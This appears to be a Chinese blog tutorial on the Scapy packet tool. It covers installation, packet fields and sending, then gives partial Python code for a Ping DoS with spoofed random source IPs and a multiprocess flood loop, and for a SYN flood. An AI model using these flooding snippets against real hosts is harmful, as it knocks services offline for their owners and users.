Scapy功能介绍以及应用

介绍

  • 首先给出官网
  • Scapy是用Python编写的交互式数据包处理工具。
  • 使用Scapy可以伪造或解码各种协议的数据包,在线发送它们,捕获它们,匹配请求和答复等等。

下载

  • 由于是Python编写的,使用pip install进行安装,这里使用清华源加速。
pip3 install scapy -i https://pypi.tuna.tsinghua.edu.cn/simple
  • 直接使用scapy命令打开,若显示无法导入相关库,则对其中缺失的相关包进行安装。
INFO: Can't import matplotlib. Won't be able to plot.
INFO: Can't import PyX. Won't be able to use psdump() or pdfdump().

使用

包配置

  • 使用TCP/IP协议构造基本数据包,这里调用了Scapy的内置函数IP()TCP()
pkt = IP()/TCP()

注意IP()一定在TCP()之前。

IP()参数解析

参数含义默认值
version版本4
ihl报头长度None
tos服务类型0x0
len报文总长度None
id标识符1
flags标记NULL
frag段偏移0
ttl生存周期64
proto协议tcp
chksum校验和None
srcIP地址127.0.0.1
dst目的IP地址127.0.0.1

TCP()参数解析

参数含义默认值
sport源端口ftp_data
dport目的端口http
seq序号0
ack确认号0
dataofs数据偏移None
reserved保留位0
flags控制功能S
window窗口大小8192
chksum校验和None
urgptr紧急指针0
options选项[]
  • 根据需求设置数据包之后,使用{PKT_NAME}.show()可以查看报文信息。
###[ IP ]### 
  version= 4
  ihl= None
  tos= 0x0
  len= None
  id= 1
  flags= 
  frag= 0
  ttl= 64
  proto= tcp
  chksum= None
  src= 192.168.239.128
  dst= 110.242.68.4
  \options\
###[ TCP ]### 
     sport= ftp_data
     dport= http
     seq= 0
     ack= 0
     dataofs= None
     reserved= 0
     flags= S
     window= 8192
     chksum= None
     urgptr= 0
     options= []

包发送

  • 使用send()函数发送数据包,该函数不返回响应。
>>> send(pkt)
.
Sent 1 packets.

sendp()等加了p的函数作用于第二层,发送的是帧。

  • sr()sr1()发送数据包并接收响应。
>>> res, unans = sr(pkt)
Begin emission:
Finished sending 1 packets.
*
Received 1 packets, got 1 answers, remaining 0 packets
>>> res
<Results: TCP:1 UDP:0 ICMP:0 Other:0>
>>> unans
<Unanswered: TCP:0 UDP:0 ICMP:0 Other:0>

sr()sr1()的区别在于,sr1()只有一个返回值(Results)。

Ping DoS

  • 使用Ping进行DoS攻击时,由于Ping使用的是ICMP协议,下面给出ICMP()的参数解析。

ICMP()参数解析

参数含义默认值
type消息类型echo-request
code代码0
chksum校验和None
id标识0x0
seq序号0x0
  • Ping攻击报文的设置比较简单,通过随机配置ICMP()也能实现Ping DoS的攻击效果。
  • 结合IP()设置目标主机IP
#判断是否随机源
if random_source ==True:
    #随机构造IP
    source_ip = Random_IP()

    ip_proto = IP(src = source_ip,
                  dst = host,
                  ttl = 1,
                  id = id_ip)
else:
    ip_proto = IP(dst = host,
                  ttl = 1,
                  id = id_ip)
	#id_ping和seq_ping均为随机配置
    icmp_proto = ICMP(id = id_ping,
                      seq = seq_ping)
    #设置数据内容
    data = b'ping dos'
	
    pkt = ip_proto / icmp_proto / data *100
    send(pkt)
  • 在这基础上,要想达到效果,我们需要增加攻击报文的量。
  • 通过循环重复攻击之外,我们采用多进程并发的方式增大攻击频率。
#processes设置太高会影响本机运作,太低起不到干扰效果
def ping_concurrent(host, processes=5, random_source=True):
    #创建进程池
    pool = multiprocessing.Pool(processes=processes)
    while True:
        try:
            #选择进程的任务和参数
            pool.apply_async(ping_times, (host, random_source))
        except KeyboardInterrupt:
            pool.terminate()

SYN_Flood

  • 多进程和重复次数的性质和Ping DoS一致,这里主要的区别在于把ICMP协议换成了TCP协议。
# Randomly generate source port
src_port = randint(1,65535)

tcp_proto = TCP(sport = src_port,
                dport = port,
                flags = "S")

pkt = ip_proto / tcp_proto
  • 其中flags变量表示了TCP三次握手的不同状态,S表示SYN
  • 1
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值